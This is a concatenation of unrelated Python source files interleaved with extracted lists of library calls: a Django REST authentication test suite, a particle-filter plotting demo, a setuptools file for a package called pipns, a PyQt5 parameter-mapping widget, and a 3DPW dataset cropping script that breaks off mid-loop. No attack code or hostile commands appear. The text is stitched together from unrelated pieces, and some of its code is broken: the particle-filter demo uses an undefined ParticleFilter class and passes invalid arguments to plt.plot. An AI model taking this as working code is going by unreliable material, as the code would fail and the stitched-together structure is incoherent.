from django.contrib.auth.tokens import PasswordResetTokenGenerator
from django.utils.encoding import smart_str, smart_bytes
from django.utils.http import urlsafe_base64_decode, urlsafe_base64_encode
from django.test.utils import override_settings
from rest_framework.exceptions import ValidationError
from rest_framework.test import APITestCase
from rest_framework import status
from rest_framework.reverse import reverse
from rest_framework_simplejwt.exceptions import TokenError
from decouple import config
# getting user model
User = get_user_model()
@override_settings(EMAIL_BACKEND=config("EMAIL_BACKEND"))
class AuthenticationTests(APITestCase):
def setUp(self):
login_user_via_email_url = reverse("users:login_via_email")
login_user_via_email_data = {
"email": "<EMAIL>",
"password": "<PASSWORD>"
}
self.logout_url = reverse("users:logout")
self.user = User.objects.create_user(email="<EMAIL>", username="online", phone_number="09335008000", password="<PASSWORD>")
self.user2 = User.objects.create_user(email="<EMAIL>", username="online2", phone_number="09335007000", password="<PASSWORD>")
self.login_user_via_email = self.client.post(login_user_via_email_url, login_user_via_email_data)
self.tokens_for_logout = self.login_user_via_email.json()
self.reset_password_uidb64 = urlsafe_base64_encode(smart_bytes(self.user.pk))
self.reset_password_token = PasswordResetTokenGenerator().make_token(self.user)
def test_registeration(self):
registeration_url = reverse("users:registeration")
registeration_data = {
"email": "<EMAIL>",
"username": "user",
"phone_number": "09122004000",
"password": "<PASSWORD>",
"repeated_password": "<PASSWORD>"
}
registeration_response = self.client.post(registeration_url, registeration_data)
# testing part
self.assertEqual(registeration_response.status_code, status.HTTP_201_CREATED)
def test_login_via_email(self):
login_via_email_url = reverse("users:login_via_email")
login_via_email_data = {
"email": "<EMAIL>",
"password": "<PASSWORD>"
}
login_via_email_response = self.client.post(login_via_email_url, login_via_email_data)
# testing part
self.assertEqual(login_via_email_response.status_code, status.HTTP_200_OK)
def test_login_via_phone_number(self):
login_via_phone_url = reverse("users:login_via_phoneNumber")
login_via_phone_data = {
"phone_number": "09335008000",
"password": "<PASSWORD>"
}
login_via_phone_response = self.client.post(login_via_phone_url, login_via_phone_data)
# testing part
self.assertEqual(login_via_phone_response.status_code, status.HTTP_200_OK)
def test_logout(self):
logout_data = {"refresh": self.tokens_for_logout["refresh"]}
self.client.credentials(HTTP_AUTHORIZATION="Bearer " + str(self.tokens_for_logout["access"]))
logout_response = self.client.post(self.logout_url, logout_data)
# testing part
self.assertEqual(logout_response.status_code, status.HTTP_204_NO_CONTENT)
def test_logout_with_bad_refresh_token(self):
logout_data = {"refresh": "SuperTrashRefreshToken"}
self.client.credentials(HTTP_AUTHORIZATION="Bearer " + str(self.tokens_for_logout["access"]))
logout_response = self.client.post(self.logout_url, logout_data)
# testing part
self.assertEqual(logout_response.status_code, status.HTTP_400_BAD_REQUEST)
def test_logout_with_already_blacklisted_refresh_token(self):
logout_data = {"refresh": self.tokens_for_logout["refresh"]}
self.client.credentials(HTTP_AUTHORIZATION="Bearer " + str(self.tokens_for_logout["access"]))
logout_response = self.client.post(self.logout_url, logout_data)
logout_response_second_try = self.client.post(self.logout_url, logout_data)
# testing part
self.assertEqual(logout_response.status_code, status.HTTP_204_NO_CONTENT)
self.assertEqual(logout_response_second_try.status_code, status.HTTP_400_BAD_REQUEST)
def test_request_reset_password_link(self):
request_reset_password_link_url = reverse("users:reset_password")
request_reset_password_link_data = {"email": "<EMAIL>"}
request_rest_password_link_response = self.client.post(request_reset_password_link_url, request_reset_password_link_data)
# testing part
self.assertEqual(request_rest_password_link_response.status_code, status.HTTP_200_OK)
def test_check_reset_password_link(self):
check_reset_password_link_url = reverse("users:reset_password_confirm", kwargs={"uidb64": self.reset_password_uidb64, "token": self.reset_password_token})
check_reset_password_link_response = self.client.get(check_reset_password_link_url)
# testing part
self.assertEqual(check_reset_password_link_response.status_code, status.HTTP_202_ACCEPTED)
def test_set_new_password(self):
set_new_password_url = reverse("users:reset_password_confirm")
set_new_password_data = {"password": "<PASSWORD>password", "repeated_password": "<PASSWORD>", "uidb64": self.reset_password_uidb64, "token": self.reset_password_token}
set_new_password_response = self.client.patch(set_new_password_url, set_new_password_data)
# testing part
self.assertEqual(set_new_password_response.status_code, status.HTTP_200_OK)
| [
"django.contrib.auth.get_user_model",
"django.contrib.auth.tokens.PasswordResetTokenGenerator",
"decouple.config",
"django.utils.encoding.smart_bytes",
"rest_framework.reverse.reverse"
] | [((605, 621), 'django.contrib.auth.get_user_model', 'get_user_model', ([], {}), '()\n', (619, 621), False, 'from django.contrib.auth import get_user_model\n'), ((777, 809), 'rest_framework.reverse.reverse', 'reverse', (['"""users:login_via_email"""'], {}), "('users:login_via_email')\n", (784, 809), False, 'from rest_framework.reverse import reverse\n'), ((954, 977), 'rest_framework.reverse.reverse', 'reverse', (['"""users:logout"""'], {}), "('users:logout')\n", (961, 977), False, 'from rest_framework.reverse import reverse\n'), ((1654, 1684), 'rest_framework.reverse.reverse', 'reverse', (['"""users:registeration"""'], {}), "('users:registeration')\n", (1661, 1684), False, 'from rest_framework.reverse import reverse\n'), ((2192, 2224), 'rest_framework.reverse.reverse', 'reverse', (['"""users:login_via_email"""'], {}), "('users:login_via_email')\n", (2199, 2224), False, 'from rest_framework.reverse import reverse\n'), ((2614, 2652), 'rest_framework.reverse.reverse', 'reverse', (['"""users:login_via_phoneNumber"""'], {}), "('users:login_via_phoneNumber')\n", (2621, 2652), False, 'from rest_framework.reverse import reverse\n'), ((4464, 4495), 'rest_framework.reverse.reverse', 'reverse', (['"""users:reset_password"""'], {}), "('users:reset_password')\n", (4471, 4495), False, 'from rest_framework.reverse import reverse\n'), ((4899, 5026), 'rest_framework.reverse.reverse', 'reverse', (['"""users:reset_password_confirm"""'], {'kwargs': "{'uidb64': self.reset_password_uidb64, 'token': self.reset_password_token}"}), "('users:reset_password_confirm', kwargs={'uidb64': self.\n reset_password_uidb64, 'token': self.reset_password_token})\n", (4906, 5026), False, 'from rest_framework.reverse import reverse\n'), ((5314, 5353), 'rest_framework.reverse.reverse', 'reverse', (['"""users:reset_password_confirm"""'], {}), "('users:reset_password_confirm')\n", (5321, 5353), False, 'from rest_framework.reverse import reverse\n'), ((656, 679), 'decouple.config', 'config', 
(['"""EMAIL_BACKEND"""'], {}), "('EMAIL_BACKEND')\n", (662, 679), False, 'from decouple import config\n'), ((1476, 1501), 'django.utils.encoding.smart_bytes', 'smart_bytes', (['self.user.pk'], {}), '(self.user.pk)\n', (1487, 1501), False, 'from django.utils.encoding import smart_str, smart_bytes\n'), ((1539, 1568), 'django.contrib.auth.tokens.PasswordResetTokenGenerator', 'PasswordResetTokenGenerator', ([], {}), '()\n', (1566, 1568), False, 'from django.contrib.auth.tokens import PasswordResetTokenGenerator\n')] |
# -*- coding: utf-8 -*-
"""Copyright 2015 <NAME>.
Code supporting the book
Kalman and Bayesian Filters in Python
https://github.com/rlabbe/Kalman-and-Bayesian-Filters-in-Python
This is licensed under an MIT license. See the LICENSE.txt file
for more information.
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import math
import matplotlib.pyplot as plt
import numpy as np
from numpy.random import uniform
from numpy.random import randn
import scipy.stats
import random
if __name__ == '__main__':
N = 2000
pf = ParticleFilter(N, 100, 100)
#pf.particles[:,2] = np.random.randn(pf.N)*np.radians(10) + np.radians(45)
z = np.array([20, 20])
#pf.create_particles(mean=z, variance=40)
mu0 = np.array([0., 0.])
plt.plot(pf, weights=False)
fig = plt.gcf()
#fig.show()
#fig.canvas.draw()
#plt.ioff()
for x in range(10):
z[0] = x+1 + randn()*0.3
z[1] = x+1 + randn()*0.3
pf.predict((1,1), (0.2, 0.2))
pf.weight(z=z, var=.8)
neff = pf.neff()
print('neff', neff)
if neff < N/2 or N <= 2000:
pf.resample()
mu, var = pf.estimate()
if x == 0:
mu0 = mu
#print(mu - z)
#print(var)
plot(pf, weights=True)
#plt.plot(z[0], z[1], marker='v', c='r', ms=10)
plt.plot(x+1, x+1, marker='*', c='r', ms=10)
plt.scatter(mu[0], mu[1], c='g', s=100)#,
#s=min(500, abs((1./np.sum(var)))*20), alpha=0.5)
plt.plot([0,100], [0,100])
plt.tight_layout()
plt.pause(.002)
#fig.canvas.draw()
#pf.assign_speed_by_gaussian(1, 1.5)
#pf.move(h=[1,1], v=1.4, t=1)
#pf.control(mu-mu0)
mu0 = mu
plt.ion()
| [
"matplotlib.pyplot.gcf",
"matplotlib.pyplot.plot",
"numpy.array",
"matplotlib.pyplot.scatter",
"matplotlib.pyplot.tight_layout",
"matplotlib.pyplot.ion",
"matplotlib.pyplot.pause",
"numpy.random.randn"
] | [((747, 765), 'numpy.array', 'np.array', (['[20, 20]'], {}), '([20, 20])\n', (755, 765), True, 'import numpy as np\n'), ((826, 846), 'numpy.array', 'np.array', (['[0.0, 0.0]'], {}), '([0.0, 0.0])\n', (834, 846), True, 'import numpy as np\n'), ((850, 877), 'matplotlib.pyplot.plot', 'plt.plot', (['pf'], {'weights': '(False)'}), '(pf, weights=False)\n', (858, 877), True, 'import matplotlib.pyplot as plt\n'), ((893, 902), 'matplotlib.pyplot.gcf', 'plt.gcf', ([], {}), '()\n', (900, 902), True, 'import matplotlib.pyplot as plt\n'), ((1901, 1910), 'matplotlib.pyplot.ion', 'plt.ion', ([], {}), '()\n', (1908, 1910), True, 'import matplotlib.pyplot as plt\n'), ((1474, 1522), 'matplotlib.pyplot.plot', 'plt.plot', (['(x + 1)', '(x + 1)'], {'marker': '"""*"""', 'c': '"""r"""', 'ms': '(10)'}), "(x + 1, x + 1, marker='*', c='r', ms=10)\n", (1482, 1522), True, 'import matplotlib.pyplot as plt\n'), ((1528, 1567), 'matplotlib.pyplot.scatter', 'plt.scatter', (['mu[0]', 'mu[1]'], {'c': '"""g"""', 's': '(100)'}), "(mu[0], mu[1], c='g', s=100)\n", (1539, 1567), True, 'import matplotlib.pyplot as plt\n'), ((1650, 1678), 'matplotlib.pyplot.plot', 'plt.plot', (['[0, 100]', '[0, 100]'], {}), '([0, 100], [0, 100])\n', (1658, 1678), True, 'import matplotlib.pyplot as plt\n'), ((1686, 1704), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (1702, 1704), True, 'import matplotlib.pyplot as plt\n'), ((1714, 1730), 'matplotlib.pyplot.pause', 'plt.pause', (['(0.002)'], {}), '(0.002)\n', (1723, 1730), True, 'import matplotlib.pyplot as plt\n'), ((1012, 1019), 'numpy.random.randn', 'randn', ([], {}), '()\n', (1017, 1019), False, 'from numpy.random import randn\n'), ((1046, 1053), 'numpy.random.randn', 'randn', ([], {}), '()\n', (1051, 1053), False, 'from numpy.random import randn\n')] |
import setuptools
# Package metadata for pipns, a pipenv-based console tool.
_METADATA = dict(
    name='pipns',
    version='0.0.12',
    author='<NAME>',
    author_email='<EMAIL>',
    url='https://github.com/nvllsvm/pipns',
    license='MIT',
    packages=['pipns'],
    entry_points={'console_scripts': ['pipns=pipns.__main__:main']},
    package_data={'pipns': ['scripts/*.py']},
    install_requires=['pipenv'],
    python_requires='>=3.7',
)
setuptools.setup(**_METADATA)
| [
"setuptools.setup"
] | [((19, 362), 'setuptools.setup', 'setuptools.setup', ([], {'name': '"""pipns"""', 'version': '"""0.0.12"""', 'author': '"""<NAME>"""', 'author_email': '"""<EMAIL>"""', 'url': '"""https://github.com/nvllsvm/pipns"""', 'license': '"""MIT"""', 'packages': "['pipns']", 'entry_points': "{'console_scripts': ['pipns=pipns.__main__:main']}", 'package_data': "{'pipns': ['scripts/*.py']}", 'install_requires': "['pipenv']", 'python_requires': '""">=3.7"""'}), "(name='pipns', version='0.0.12', author='<NAME>',\n author_email='<EMAIL>', url='https://github.com/nvllsvm/pipns', license\n ='MIT', packages=['pipns'], entry_points={'console_scripts': [\n 'pipns=pipns.__main__:main']}, package_data={'pipns': ['scripts/*.py']},\n install_requires=['pipenv'], python_requires='>=3.7')\n", (35, 362), False, 'import setuptools\n')] |
from PyQt5.QtWidgets import QWidget, QLabel, QLineEdit, QComboBox, QGroupBox, QPushButton, QGridLayout
from PyQt5.QtGui import QFont, QFontMetrics
from PyQt5 import QtGui
from json_appdata import *
import utils
# Module-level widget registries shared by ParameterMappingGroupBox.
# `labels` holds transient QLabel widgets scheduled for deletion on refresh;
# `lineEdits` maps a database column name to its read-only QLineEdit and
# "<column>_s" to the editable supplier-side QLineEdit.
labels = []
lineEdits = {}
# Appdata file that persists the supplier -> table -> parameter mapping.
jsonFile = 'supplier_parameter_mapping.json'
class ParameterMappingGroupBox(QGroupBox):
    """Group box that lets the user map database column names to the
    parameter names used by each supplier, one editable row per column.

    The mapping is kept as ``paramsDicts[supplier][table][db_column] ->
    supplier_parameter`` and persisted to ``jsonFile`` via the Save button.
    """

    def __init__(self, tableList, tableColumnsList, supplierList):
        """Build the grid of table/supplier selectors and mapping rows.

        Args:
            tableList: database table names shown in the table combo box.
            tableColumnsList: per-table lists of column names, parallel to
                ``tableList``.
            supplierList: supplier names shown in the supplier combo box.
        """
        super().__init__("Parameter mapping")
        self.tableColumnsList = tableColumnsList
        self.paramsDicts = {}
        # Use the application's default font metrics to derive spacing that
        # scales with the user's font size.
        fm = QFontMetrics(QFont(QtGui.QGuiApplication.font().family(), QtGui.QGuiApplication.font().pointSize()))
        self.textHeight = fm.boundingRect("Text").height()
        # Default mapping: every database column maps to itself.
        for supplier in supplierList:
            self.paramsDicts[supplier] = {}
            for i, table in enumerate(tableList):
                self.paramsDicts[supplier][table] = {}
                for dbParam in tableColumnsList[i]:
                    self.paramsDicts[supplier][table][dbParam] = dbParam
        # A previously saved mapping (if any) overrides the defaults wholesale.
        configDict = loadFromJson(jsonFile)
        if len(configDict) > 0:
            self.paramsDicts = configDict
        # Grid geometry constants: columns for the DB side, the spacer between
        # the two sides, and the supplier side; rows for combos/headers/fields.
        self.dbParamsColumn = 0
        self.equalsLabelColumn = 2
        self.supplierParamsColumn = 3
        self.comboBoxRow = 0
        self.labelRow = 1
        self.fieldsRow = 2
        self.mainGridLayout = QGridLayout()
        self.setLayout(self.mainGridLayout)
        self.dbTableLabel = QLabel("Database Table:")
        self.mainGridLayout.addWidget(self.dbTableLabel, self.comboBoxRow, self.dbParamsColumn)
        self.tableListComboBox = QComboBox()
        self.tableListComboBox.addItems(tableList)
        self.tableListComboBox.setCurrentIndex(0)
        # Changing either combo box rebuilds the mapping rows below.
        self.tableListComboBox.currentTextChanged.connect(self.updateTableMappingFields)
        self.mainGridLayout.addWidget(self.tableListComboBox, self.comboBoxRow, self.dbParamsColumn + 1)
        self.supplierTableLabel = QLabel("Supplier:")
        self.mainGridLayout.addWidget(self.supplierTableLabel, self.comboBoxRow, self.supplierParamsColumn)
        self.supplierListComboBox = QComboBox()
        self.supplierListComboBox.addItems(supplierList)
        self.supplierListComboBox.currentTextChanged.connect(self.updateTableMappingFields)
        self.mainGridLayout.addWidget(self.supplierListComboBox, self.comboBoxRow, self.supplierParamsColumn + 1)
        self.mainGridLayout.setSpacing(self.textHeight * 0.6)
        self.mainGridLayout.setColumnMinimumWidth(2, self.textHeight * 3)
        self.dbParamLabel = QLabel("Database Field Name")
        self.mainGridLayout.addWidget(self.dbParamLabel, self.labelRow, self.dbParamsColumn)
        self.supParamLabel = QLabel("Supplier Parameter")
        self.mainGridLayout.addWidget(self.supParamLabel, self.labelRow, self.supplierParamsColumn)
        # Save starts disabled; it is enabled when any supplier field changes.
        self.saveButton = QPushButton("Save")
        self.saveButton.setEnabled(False)
        self.saveButton.setProperty('accent', True)
        self.saveButton.released.connect(self.saveCmd)
        self.mainGridLayout.addWidget(self.saveButton, self.fieldsRow, self.supplierParamsColumn + 1)
        self.updateTableMappingFields()

    def updateTableMappingFields(self):
        """Rebuild the per-column mapping rows for the currently selected
        table and supplier, disposing of the previous rows' widgets."""
        row = self.fieldsRow
        supplier = self.supplierListComboBox.currentText()
        table = self.tableListComboBox.currentText()
        # Dispose of the widgets from the previous selection; deleteLater is
        # required because Qt still owns them until the event loop runs.
        for label in labels:
            label.deleteLater()
        labels.clear()
        for k in lineEdits:
            lineEdits[k].deleteLater()
        lineEdits.clear()
        # Detach the save button so it can be re-added below the new rows.
        self.mainGridLayout.takeAt(self.mainGridLayout.indexOf(self.saveButton))
        for param in self.tableColumnsList[self.tableListComboBox.currentIndex()]:
            dbLineEdit = QLineEdit(param)
            dbLineEdit.setReadOnly(True)
            lineEdits[param] = dbLineEdit
            self.mainGridLayout.addWidget(dbLineEdit, row, self.dbParamsColumn, 1, 2)
            supplierLineEdit = QLineEdit()
            supplierLineEdit.setText(self.paramsDicts[supplier][table][param])
            supplierLineEdit.textChanged.connect(lambda: self.saveButton.setEnabled(True))
            # Default arguments (t/s/p) freeze the current loop values so each
            # row's handler updates its own mapping entry, not the last row's.
            supplierLineEdit.textChanged.connect(lambda string, t=table, s=supplier, p=param:
                                                 utils.assignToDict(self.paramsDicts[s][t],
                                                                    lineEdits[p].text(),
                                                                    string))
            lineEdits[param + "_s"] = supplierLineEdit
            self.mainGridLayout.addWidget(supplierLineEdit, row, self.supplierParamsColumn, 1, 2)
            row += 1
        self.mainGridLayout.addWidget(self.saveButton, row, self.supplierParamsColumn + 1)

    def saveCmd(self):
        """Persist the full mapping to the appdata JSON file and re-disable Save."""
        saveToJson(jsonFile, self.paramsDicts)
        self.saveButton.setEnabled(False)

    def getParamsDict(self, supplier, table):
        """Return the db-column -> supplier-parameter mapping for one supplier/table."""
        return self.paramsDicts[supplier][table]
| [
"PyQt5.QtWidgets.QComboBox",
"PyQt5.QtWidgets.QGridLayout",
"PyQt5.QtWidgets.QLabel",
"PyQt5.QtWidgets.QPushButton",
"PyQt5.QtWidgets.QLineEdit",
"PyQt5.QtGui.QGuiApplication.font"
] | [((1390, 1403), 'PyQt5.QtWidgets.QGridLayout', 'QGridLayout', ([], {}), '()\n', (1401, 1403), False, 'from PyQt5.QtWidgets import QWidget, QLabel, QLineEdit, QComboBox, QGroupBox, QPushButton, QGridLayout\n'), ((1480, 1505), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['"""Database Table:"""'], {}), "('Database Table:')\n", (1486, 1505), False, 'from PyQt5.QtWidgets import QWidget, QLabel, QLineEdit, QComboBox, QGroupBox, QPushButton, QGridLayout\n'), ((1639, 1650), 'PyQt5.QtWidgets.QComboBox', 'QComboBox', ([], {}), '()\n', (1648, 1650), False, 'from PyQt5.QtWidgets import QWidget, QLabel, QLineEdit, QComboBox, QGroupBox, QPushButton, QGridLayout\n'), ((1987, 2006), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['"""Supplier:"""'], {}), "('Supplier:')\n", (1993, 2006), False, 'from PyQt5.QtWidgets import QWidget, QLabel, QLineEdit, QComboBox, QGroupBox, QPushButton, QGridLayout\n'), ((2155, 2166), 'PyQt5.QtWidgets.QComboBox', 'QComboBox', ([], {}), '()\n', (2164, 2166), False, 'from PyQt5.QtWidgets import QWidget, QLabel, QLineEdit, QComboBox, QGroupBox, QPushButton, QGridLayout\n'), ((2602, 2631), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['"""Database Field Name"""'], {}), "('Database Field Name')\n", (2608, 2631), False, 'from PyQt5.QtWidgets import QWidget, QLabel, QLineEdit, QComboBox, QGroupBox, QPushButton, QGridLayout\n'), ((2758, 2786), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['"""Supplier Parameter"""'], {}), "('Supplier Parameter')\n", (2764, 2786), False, 'from PyQt5.QtWidgets import QWidget, QLabel, QLineEdit, QComboBox, QGroupBox, QPushButton, QGridLayout\n'), ((2917, 2936), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""Save"""'], {}), "('Save')\n", (2928, 2936), False, 'from PyQt5.QtWidgets import QWidget, QLabel, QLineEdit, QComboBox, QGroupBox, QPushButton, QGridLayout\n'), ((3803, 3819), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', (['param'], {}), '(param)\n', (3812, 3819), False, 'from PyQt5.QtWidgets import QWidget, QLabel, QLineEdit, QComboBox, QGroupBox, 
QPushButton, QGridLayout\n'), ((4026, 4037), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (4035, 4037), False, 'from PyQt5.QtWidgets import QWidget, QLabel, QLineEdit, QComboBox, QGroupBox, QPushButton, QGridLayout\n'), ((575, 603), 'PyQt5.QtGui.QGuiApplication.font', 'QtGui.QGuiApplication.font', ([], {}), '()\n', (601, 603), False, 'from PyQt5 import QtGui\n'), ((614, 642), 'PyQt5.QtGui.QGuiApplication.font', 'QtGui.QGuiApplication.font', ([], {}), '()\n', (640, 642), False, 'from PyQt5 import QtGui\n')] |
import os
import cv2
import numpy as np
import torch
import pickle
import argparse
from configs import paths
from utils.cam_utils import perspective_project_torch
from models.smpl_official import SMPL
def rotate_2d(pt_2d, rot_rad):
    """Rotate a 2-D point counter-clockwise about the origin.

    Args:
        pt_2d: sequence of two coordinates (x, y).
        rot_rad: rotation angle in radians.

    Returns:
        float32 numpy array with the rotated (x, y).
    """
    cos_t = np.cos(rot_rad)
    sin_t = np.sin(rot_rad)
    rotated_x = pt_2d[0] * cos_t - pt_2d[1] * sin_t
    rotated_y = pt_2d[0] * sin_t + pt_2d[1] * cos_t
    return np.array([rotated_x, rotated_y], dtype=np.float32)
def gen_trans_from_patch_cv(c_x, c_y, src_width, src_height, dst_width, dst_height, scale, rot, inv=False):
    """Compute the 2x3 affine transform mapping a source patch onto a
    destination patch, with scale and rotation augmentation on the source.

    Args:
        c_x, c_y: centre of the source patch in source-image coordinates.
        src_width, src_height: source patch size before augmentation.
        dst_width, dst_height: destination patch size.
        scale: scale augmentation factor applied to the source patch.
        rot: rotation augmentation angle in degrees.
        inv: if True, return the inverse (destination -> source) mapping.

    Returns:
        2x3 affine matrix from ``cv2.getAffineTransform``.
    """
    rot_rad = np.pi * rot / 180
    half_w = src_width * scale * 0.5
    half_h = src_height * scale * 0.5

    # Three reference points per patch (centre, mid-bottom, mid-right); the
    # source triplet is rotated by the augmentation angle about the centre.
    src_center = np.array([c_x, c_y], dtype=np.float32)
    src_pts = np.float32([
        src_center,
        src_center + rotate_2d(np.array([0, half_h], dtype=np.float32), rot_rad),
        src_center + rotate_2d(np.array([half_w, 0], dtype=np.float32), rot_rad),
    ])

    dst_center = np.array([dst_width * 0.5, dst_height * 0.5], dtype=np.float32)
    dst_pts = np.float32([
        dst_center,
        dst_center + np.array([0, dst_height * 0.5], dtype=np.float32),
        dst_center + np.array([dst_width * 0.5, 0], dtype=np.float32),
    ])

    # The inverse mapping is just the same point correspondence reversed.
    if inv:
        src_pts, dst_pts = dst_pts, src_pts
    return cv2.getAffineTransform(src_pts, dst_pts)
def generate_patch_image_cv(cvimg, c_x, c_y, bb_width, bb_height, patch_width, patch_height,
                            do_flip, scale, rot):
    """Warp a (optionally flipped/scaled/rotated) bounding-box region of an
    image into a fixed-size patch.

    Returns:
        (img_patch, trans): the warped patch of shape
        (patch_height, patch_width, channels) and the 2x3 affine matrix
        used to produce it.
    """
    img = cvimg.copy()
    if do_flip:
        # Mirror horizontally and move the box centre to the mirrored column.
        img = img[:, ::-1, :]
        c_x = img.shape[1] - c_x - 1

    trans = gen_trans_from_patch_cv(c_x, c_y, bb_width, bb_height,
                                    patch_width, patch_height, scale, rot,
                                    inv=False)
    img_patch = cv2.warpAffine(img, trans, (int(patch_width), int(patch_height)),
                               flags=cv2.INTER_LINEAR,
                               borderMode=cv2.BORDER_CONSTANT)
    return img_patch, trans
def get_single_image_crop(image, bbox, scale=1.2, crop_size=224):
    """Return a square crop of ``image`` centred on a bounding box.

    Args:
        image: an RGB image array, or a path to an image file (loaded as RGB).
        bbox: (center_x, center_y, width, height) of the region to crop.
        scale: padding factor applied to the bounding box before cropping.
        crop_size: side length in pixels of the returned square patch.

    Returns:
        The cropped (crop_size, crop_size, channels) image patch.

    Raises:
        FileNotFoundError: if ``image`` is a path that does not exist.
        TypeError: if ``image`` is neither a path nor a numpy array.
    """
    if isinstance(image, str):
        if not os.path.isfile(image):
            print(image)
            # Was `raise BaseException(...)`; FileNotFoundError is specific
            # and still caught by any existing `except BaseException` handler.
            raise FileNotFoundError('{} is not a valid file!'.format(image))
        image = cv2.cvtColor(cv2.imread(image), cv2.COLOR_BGR2RGB)
    elif not isinstance(image, np.ndarray):
        # The original `raise('Unknown type for object', type(image))` called
        # a string, which itself raised TypeError('exceptions must derive
        # from BaseException'); raise the intended TypeError explicitly.
        raise TypeError('Unknown type for object: {}'.format(type(image)))

    crop_image, trans = generate_patch_image_cv(
        cvimg=image.copy(),
        c_x=bbox[0],
        c_y=bbox[1],
        bb_width=bbox[2],
        bb_height=bbox[3],
        patch_width=crop_size,
        patch_height=crop_size,
        do_flip=False,
        scale=scale,
        rot=0,
    )
    return crop_image
def pw3d_eval_extract(dataset_path, out_path, crop_wh=512):
    """Extract the 3DPW test split into cropped frames plus one npz annotation file.

    For every person in every test sequence, frames whose camera pose is
    valid for that person are cropped around the projected SMPL body and
    written to ``out_path/cropped_frames``; per-frame pose (global orientation
    rotated into the camera frame), shape, bbox centre/size and gender are
    accumulated into ``out_path/3dpw_test.npz``.

    Args:
        dataset_path: 3DPW root (contains sequenceFiles/ and imageFiles/).
        out_path: output directory; must contain a 'cropped_frames' subfolder.
        crop_wh: side length in pixels of the square crops.
    """
    bbox_scale_factor = 1.2
    smpl_male = SMPL(paths.SMPL, batch_size=1, gender='male').to(device)
    smpl_female = SMPL(paths.SMPL, batch_size=1, gender='female').to(device)

    cropped_frame_fnames_, whs_, centers_, = [], [], []
    poses_, shapes_, genders_ = [], [], []

    sequence_files = sorted([os.path.join(dataset_path, 'sequenceFiles', 'test', f)
                             for f in os.listdir(os.path.join(dataset_path, 'sequenceFiles', 'test'))
                             if f.endswith('.pkl')])
    for filename in sequence_files:
        print('\n\n\n', filename)
        with open(filename, 'rb') as f:
            data = pickle.load(f, encoding='latin1')
            smpl_poses = data['poses']  # list of (num frames, 72) pose params for each person
            smpl_betas = data['betas']  # list of (10,) or (300,) shape params for each person
            poses2d = data['poses2d']  # list of (num frames, 3, 18) 2d kps for each person
            cam_extrinsics = data['cam_poses']  # array of (num frames, 4, 4) cam extrinsics
            cam_K = data['cam_intrinsics']  # array of (3, 3) cam intrinsics.
            genders = data['genders']  # list of genders for each person
            valid = data['campose_valid']  # list of (num frames,) boolean arrays for each person, indicating whether camera pose has been aligned to that person (for trans).
            trans = data['trans']  # list of (num frames, 3) translations in SMPL space for each person, to align them with image data (after projection)

            num_people = len(smpl_poses)  # Number of people in sequence
            num_frames = len(smpl_poses[0])  # Number of frames in sequence
            seq_name = str(data['sequence'])
            print('smpl poses', len(smpl_poses), smpl_poses[0].shape,
                  'smpl betas', len(smpl_betas), smpl_betas[0].shape,
                  'poses2d', len(poses2d), poses2d[0].shape,
                  'global poses', cam_extrinsics.shape,
                  'cam_K', cam_K.shape,
                  'genders', genders, type(genders),
                  'valid', len(valid), valid[0].shape, np.sum(valid[0]), np.sum(valid[-1]),
                  'trans', len(trans), trans[0].shape,
                  'num people', num_people, 'num frames', num_frames, 'seq name', seq_name, '\n')

            cam_K = torch.from_numpy(cam_K[None, :]).float().to(device)

            for person_num in range(num_people):
                # Get valid frames flags, shape and gender.
                # `np.bool` was removed in NumPy 1.24; the builtin `bool`
                # is the documented, identical replacement.
                valid_frames = valid[person_num].astype(bool)
                shape = smpl_betas[person_num][:10]
                torch_shape = torch.from_numpy(shape[None, :]).float().to(device)
                gender = genders[person_num]

                for frame_num in range(num_frames):
                    if valid_frames[frame_num]:  # Only proceed if frame has valid camera pose for person
                        # Pose the gendered SMPL model in world space, then
                        # project its vertices to get a tight bounding box.
                        pose = smpl_poses[person_num][frame_num]
                        cam_R = cam_extrinsics[frame_num][:3, :3]
                        cam_t = cam_extrinsics[frame_num][:3, 3]
                        frame_trans = trans[person_num][frame_num]
                        pose = torch.from_numpy(pose[None, :]).float().to(device)
                        cam_t = torch.from_numpy(cam_t[None, :]).float().to(device)
                        cam_R = torch.from_numpy(cam_R[None, :, :]).float().to(device)
                        frame_trans = torch.from_numpy(frame_trans[None, :]).float().to(device)

                        if gender == 'm':
                            smpl_out = smpl_male(body_pose=pose[:, 3:],
                                                 global_orient=pose[:, :3],
                                                 betas=torch_shape,
                                                 transl=frame_trans)
                        elif gender == 'f':
                            smpl_out = smpl_female(body_pose=pose[:, 3:],
                                                   global_orient=pose[:, :3],
                                                   betas=torch_shape,
                                                   transl=frame_trans)

                        vertices = smpl_out.vertices
                        projected_aligned_vertices = perspective_project_torch(vertices, cam_R,
                                                                                cam_t, cam_K=cam_K)
                        projected_aligned_vertices = projected_aligned_vertices[0].cpu().detach().numpy()
                        # (x1, y1, x2, y2): x is cols, y is rows from top-left.
                        bbox = [min(projected_aligned_vertices[:, 0]),
                                min(projected_aligned_vertices[:, 1]),
                                max(projected_aligned_vertices[:, 0]),
                                max(projected_aligned_vertices[:, 1])]
                        center = [(bbox[2] + bbox[0]) / 2, (bbox[3] + bbox[1]) / 2]
                        wh = max(bbox[2] - bbox[0], bbox[3] - bbox[1])

                        # Save cropped frame using the bounding box.
                        image_fpath = os.path.join(dataset_path, 'imageFiles', seq_name,
                                                   'image_{}.jpg'.format(str(frame_num).zfill(5)))
                        image = cv2.imread(image_fpath)
                        centre_wh_bbox = center + [wh, wh]
                        cropped_image = get_single_image_crop(image, centre_wh_bbox,
                                                              scale=bbox_scale_factor,
                                                              crop_size=crop_wh)
                        cropped_image_fname = seq_name + '_image_{}_person_{}.png'.format(str(frame_num).zfill(5),
                                                                                          str(person_num).zfill(3))
                        cropped_image_fpath = os.path.join(out_path, 'cropped_frames',
                                                           cropped_image_fname)
                        cv2.imwrite(cropped_image_fpath, cropped_image)

                        # Rotate the global orientation into camera frame
                        # before storing, so the stored pose matches the image.
                        pose = pose[0].cpu().detach().numpy()
                        cam_R = cam_R[0].cpu().detach().numpy()
